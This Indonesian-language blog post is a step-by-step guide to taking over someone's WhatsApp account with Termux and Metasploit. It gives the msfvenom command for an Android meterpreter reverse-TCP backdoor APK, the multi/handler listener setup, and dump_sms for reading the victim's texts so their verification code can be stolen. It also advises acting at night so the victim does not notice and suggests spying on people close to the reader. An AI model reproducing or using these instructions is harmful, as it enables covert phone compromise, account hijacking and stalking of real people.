Sadap Whatsapp Lewat Termux 100% work (Script terbaru)

Cara hack wa dengan Termux

Oke guys, berjumpa lagi di blog Masiwan.my.id . Kali ini kami akan membagikan tutorial sadap whatsapp via termux. Jadi postingan ini akan membahas cara yang bisa digunakan untuk melakukan sadap atau hack whatsapp menggunakan termux.

Pada kesempatan kali ini kami tidak akan menggunakan script sadap wa. Tapi kami akan menggunakan Tool Metasploit. Tool ini bisa kita manfaatkan untuk mendapatkan remote akses android korban.

Jadi secara singkat, yang akan kami bagikan pada postingan ini adalah menginstal tool Metasploit di termux dan melakukan sadap wa menggunakan Metasploit. Berikut tutorial lengkap nya.

Sadap Wa menggunakan Metasploit di Termux

Bagi yang belum punya aplikasi termux, silahkan download di playstore. Jangan lupa juga pelajari dulu cara menggunakan termux agar bisa mengikuti tutorial nya dengan baik. Karena semua tutorial ini akan banyak menggunakan perintah dasar termux.


Dan bagi yang sudah mahir langsung saja ke tutorialnya. Silahkan ikuti langkah-langkah berikut ini:

Install Metasploit Framework di Termux

Cara install Metasploit sangat mudah. Hanya saja ukuran dari file Metasploit yang cukup besar yaitu 560mb. Sehingga kalian harus siapkan ruang penyimpanan dan kuota yang banyak.

Untuk menginstal Metasploit framework kalian bisa gunakan command berikut di aplikasi termux

  • apt update && apt upgrade
  • pkg install unstable-repo
  • pkg install metasploit


Apabila kurang paham, sudah kami jabarkan di halaman cara install Metasploit. Disana juga ada cara untuk mengatasi apabila terjadi error.

Buat Aplikasi Sadap Wa Menggunakan Termux

Untuk cara membuat backdoor atau aplikasi sadap wa kita harus menjalankan tool Metasploit nya. Gunakan command.
msfconsole
Tunggu sampai tampilan nya berubah seperti gambar dibawah ini.

Selanjutnya masukkan command berikut dan perhatikan penjelasan nya agar tidak terjadi error.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101  LPORT=8080 -o /sdcard/tracker.apk

# LHOST adalah IP address kalian. Cara cek ip address masuk saja ke setting/pengaturan lalu pilih tentang ponsel dan cari lagi menu status.

Jika android kalian tidak support, Silahakan gunakan cara online  di  cara cek ip address.

# LPORT kalian isi saja 8080

# /sdcard/tracker.apk adalah tempat simpan dan nama file (backdoor). Kalian bisa ganti nama file sesuai keinginan. Tapi untuk tempat simpan nya sebaiknya tetap.

Tunggu sampai proses pembuatan aplikasi backdoor nya selesai. Biasanya memakan waktu 3-5 menit.

Setelah selesai, pergi ke file manager dan cari file/aplikasi backdoor sesuai nama yang kalian berikan. Kemudian kirimkan aplikasi tersebut ke target sadap wa kalian.

Proses sadap wa

Setelah aplikasi backdoor nya dikirimkan. Pastikan korban juga harus menginstal aplikasi tersebut.

Selanjutnya kita scan/cek apakah aplikasi sudah di install apa belum menggunakan command berikut:
.use multi/handler
.set payload android/meterpreter/reverse_tcp
.set lhost 192.168.1.101
.set lport 4444
.exploit

Maka hasilnya akan seperti gambar dibawah ini.

Tunggu sampai aplikasi backdoor terkonek dengan IP address kita. Apabila pada tahap ini berlangsung sangat lama. Suruh korban untuk mengklik aplikasi yang sudah diinstall tadi.

Dan jika hasilnya sudah menunjukkan seperti gambar diatas. Kita ketikan saja

dump_sms


Maka semua pesan masuk korban akan bisa terbaca oleh kita. Dengan demikian untuk mendapatkan kode verifikasi dari whatsapp sangat lah mudah.

Hal terakhir kita hanya perlu melakukan pendaftaran ulang whatsapp menggunakan nomor korban. Dan pada saat harus memasukkan kode konfirmasi kita tinggal ulangi saja semua dari langkah proses sadap wa

Eror Yang Terjadi Saat Melakukan Sadap wa Termux


Biasanya error akan terjadi pada saat kita menginstal Metasploit dan pada saat memasukkan command.

Error lain juga bisa disebabkan oleh koneksi yang kurang stabil. Eror masalah koneksi biasanya terjadi pada saat mengkoneksikan aplikasi backdoor dengan IP address kita.

Untuk mengatasi semua Eror yang terjadi. Kami sudah merangkum nya dari pertanyaan yang sering ditanyakan user. Berikut FAQ mengatasi eror sadap wa Termux.

Bagaimana cara mengatasi error install Metasploit?Kami sudah tuliskan beberapa opsi yang bisa digunakan untuk mengatasi error install Metasploit di halaman cara install Metasploit

Apakah sadap wa menggunakan termux sudah pasti berhasil?Kami pastikan 100% berhasil, dengan catatan kalian tidak melewatkan satu langkah/command yang kami tuliskan.

Apakah korban sadap wa Termux akan tau kalau dia sedang disadap?
Tentu saja akan tau dengan adanya SMS konfirmasi yang masuk tanpa dia minta. Jadi sebaiknya proses sadap dilakukan di malam hari atau pada saat korban tidak menggunakan hp nya.

Berapa lama penyadapan whatsapp menggunakan termux bisa bertahan?
Selama aplikasi backdoor masih diinstal oleh korban. Maka selama itu kita masih bisa melakukan penyadapan. Selalu gunakan command dump_sms untuk mendapatkan kode SMS verifikasi nya.

Oke guys, sekarang kita sudah belajar bagaimana cara melakukan sadap wa menggunakan termux. Semoga bisa bermanfaat.

Gunakan saja trik ini kepada orang-orang terdekat untuk mengawasi kegiatan mereka. Jangan gunakan untuk tindakan kejahatan. Kami tidak bertanggung jawab atas itu.

Jangan lupa untuk nantikan update terbaru dari dari blog Masiwan.my.id dengan SUBSCRIBE blog ini melalui form di bawah. Terimakasih.
Sadap Whatsapp Lewat Termux 100% work (Script terbaru)
Blog ini dibuat dengan tujuan untuk berbagi kepada semua orang yang membutuhkannya.

You May Like These

Ikuti blog Siap Ngoding untuk mendapatkan notifikasi terbaru!